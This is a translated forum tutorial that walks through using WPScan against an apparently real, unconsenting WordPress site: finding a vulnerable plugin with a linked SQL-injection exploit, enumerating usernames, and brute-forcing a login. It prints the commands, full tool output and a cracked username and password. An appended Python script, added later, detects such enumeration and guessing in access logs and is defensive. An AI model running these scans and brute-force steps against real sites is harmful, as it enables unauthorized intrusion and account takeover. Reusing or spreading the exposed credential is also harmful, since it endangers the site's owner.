12-30-2012, 11:49 PM
No need for a lot of talk, guys :tkp::tkp:
I wrote this myself, it's original :-bd
1. Open wpscan.rb ( /pentest/web/wpscan )
2. Type wpscan.rb, then press Enter. It usually asks whether you want to update or not; if not, type n, and if you want to update, type y.
[*] If you choose y, then once the update has finished, an error like this usually shows up when you open wpscan.rb
Code:
root@bt:/pentest/web/wpscan# ./wpscan.rb -h
[ERROR] Install missing ruby gem. Please see README file or http://code.google.com/p/wpscan/
#<LoadError: no such file to load -- nokogiri>
The solution is already in the error message, bro -_- :
Code:
gem install --user-install nokogiri
Code:
root@bt:/pentest/web/wpscan# gem install --user-install nokogiri
WARNING: You don't have /root/.gem/ruby/1.9.2/bin in your PATH,
gem executables will not run.
Building native extensions. This could take a while...
Successfully installed nokogiri-1.5.2
1 gem installed
Installing ri documentation for nokogiri-1.5.2...
Installing RDoc documentation for nokogiri-1.5.2...
3. Type ./wpscan.rb or ./wpscan.rb --help
Code:
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
Help :
Some values are settable in conf/browser.conf.json :
user-agent, proxy, threads, cache timeout and request timeout
--update Update to the latest revision
--url | -u <target url> The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)] Enumeration.
option :
u usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p plugins
p! only vulnerable plugins
t timthumbs
Multiple values are allowed : '-e tp' will enumerate timthumbs and plugins
If no option is supplied, the default is 'tup!'
--follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed
--wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy Supply a proxy in the format host:port (will override the one from conf/browser.conf.json)
--wordlist | -w <wordlist> Supply a wordlist for the password bruter and do the brute.
--threads | -t <number of threads> The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)
--username | -U <username> Only brute force the supplied username.
--help | -h This help screen.
--verbose | -v Verbose output.
From here you can carry on by yourself, right, bro? \m/
If there are some who don't know yet, well, I'll give the tutorial as well. For those who already know, why did you come here? :-?
4. Enter the URL and choose the other options; for example, I want to look at its vulnerable plugins:
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate p!
Code:
root@bt:/pentest/web/wpscan# ./wpscan.rb --url www.productbestbuy.com --enumerate p!
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 21:54:53 2012
[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ... 2 found :
| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/
[+] Enumerating installed plugins (only vulnerable ones) ...
Checking for 253 total plugins... 100% complete.
[+] We found 1 plugins:
| Name: jetpack
| Location: http://www.productbestbuy.com/wp-content/plugins/jetpack/
| Directory listing enabled? Yes.
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/
[+] Finished at Sun Dec 30 21:56:44 2012
There you go, bro, found 1 vulnerable plugin, and it even comes with its exploit already
5. Now let me try to find the usernames:
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate u
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate u
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:22:31 2012
[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ... 2 found :
| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/
[+] Enumerating usernames ...
We found the following 2 username/s :
admin
developer
There are 2 users, bro: admin and developer
The new version of wpscan is strange: I'm only looking for usernames, yet the plugins get scanned too :-? (just a waste of time)
6. Now to find the password using brute force, so that means a wordlist.lst has to be prepared. My wordlist is located at /root/Desktop/wordlist.lst
Code:
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
Code:
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:36:41 2012
[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ...
2 found :
| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/
[+] Starting the password brute forcer
Brute forcing user 'developer' with 12 passwords... 58% complete.
[SUCCESS] Username : developer Password : cisadane123456
[+] Finished at Sun Dec 30 22:38:18 2012
Code:
Username : developer Password : cisadane123456
Author: RieqyNS13
wpscan developer: ethicalhacke3r
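Added example, not part of the original post: a defender-side check that scans web server access logs for the two activities shown above, username enumeration and password guessing. It assumes Apache combined log format, that enumeration appears as GET requests with many distinct `?author=N` values, and that a failed WordPress login is answered with 200 while a successful one is answered with 302; the sample lines, IP addresses, function names and thresholds are constructed.

```python
import re
from collections import defaultdict

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
AUTHOR = re.compile(r'[?&]author=(\d+)')

def build_sample():
    """Constructed access-log lines (documentation IP ranges, not real traffic)."""
    fmt = '{ip} - - [30/Dec/2012:22:00:00 +0000] "{req} HTTP/1.1" {st} 512 "-" "-"'
    noisy, normal = "203.0.113.7", "198.51.100.20"
    lines = [fmt.format(ip=noisy, req=f"GET /?author={i}", st=301) for i in range(1, 11)]
    lines += [fmt.format(ip=noisy, req="POST /wp-login.php", st=200)] * 6
    lines += [fmt.format(ip=noisy, req="POST /wp-login.php", st=302)]
    lines += [fmt.format(ip=normal, req="GET /?author=2", st=301),
              fmt.format(ip=normal, req="POST /wp-login.php", st=200),
              fmt.format(ip=normal, req="POST /wp-login.php", st=302)]
    return "\n".join(lines)

def detect(log_text, enum_min=5, login_min=5):
    """Return {ip: [tags]} for clients that enumerate authors or guess passwords."""
    author_ids = defaultdict(set)   # distinct ?author=N values requested per client
    failures = defaultdict(int)     # POSTs to wp-login.php answered with 200
    breached = set()                # clients that got a 302 after many failures
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                # skip lines that are not in the expected format
        ip, method, path, status = m.groups()
        author = AUTHOR.search(path)
        if method == "GET" and author:
            author_ids[ip].add(int(author.group(1)))
        elif method == "POST" and path.split("?")[0].endswith("/wp-login.php"):
            if status == "200":
                failures[ip] += 1
            elif status == "302" and failures[ip] >= login_min:
                breached.add(ip)
    findings = {}
    for ip in sorted(set(author_ids) | set(failures)):
        tags = []
        if len(author_ids[ip]) >= enum_min:
            tags.append("author-enumeration")
        if failures[ip] >= login_min:
            tags.append("login-bruteforce")
        if ip in breached:
            tags.append("success-after-failures")
        if tags:
            findings[ip] = tags
    return findings

if __name__ == "__main__":
    print(detect(build_sample()))
```

A `success-after-failures` tag is the one to act on first: it marks a client whose guessing ended in a successful login, so that account's password should be reset and its sessions invalidated.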